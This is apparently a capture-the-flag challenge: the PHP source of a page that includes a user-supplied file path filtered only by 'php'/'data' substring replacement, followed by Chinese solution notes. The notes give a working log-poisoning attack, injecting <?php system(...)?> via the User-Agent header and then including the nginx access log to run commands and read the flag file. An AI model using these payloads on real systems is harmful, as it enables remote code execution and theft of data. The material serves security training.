<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
// Challenge source: the include target is taken directly from the
// query-string parameter "file" (untrusted input).
if(isset($_GET['file'])){
$file = $_GET['file'];
// Substring blacklist: only the literal substrings "php" and "data" are
// rewritten to "???". Nothing restricts the path itself, so any readable
// file whose path contains neither substring reaches include() unchanged.
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
// Sink: include() of a user-controlled path (local file inclusion).
// Defensive fix: resolve the name against an allowlist of permitted targets
// (or a fixed directory plus basename()/realpath() check) instead of
// substring blacklisting.
include($file);
}else{
// No parameter: show this file's own source.
highlight_file(__FILE__);
}
过滤了 php、data，其他伪协议都用不了
考虑用日志文件包含
GET
?file=/var/log/nginx/access.log
User-Agent
<?php system('ls');?>
可能要发几次才能出来
然后再换
<?php system('cat fl0g.php');?>
但页面上仍然没有 flag，查看源代码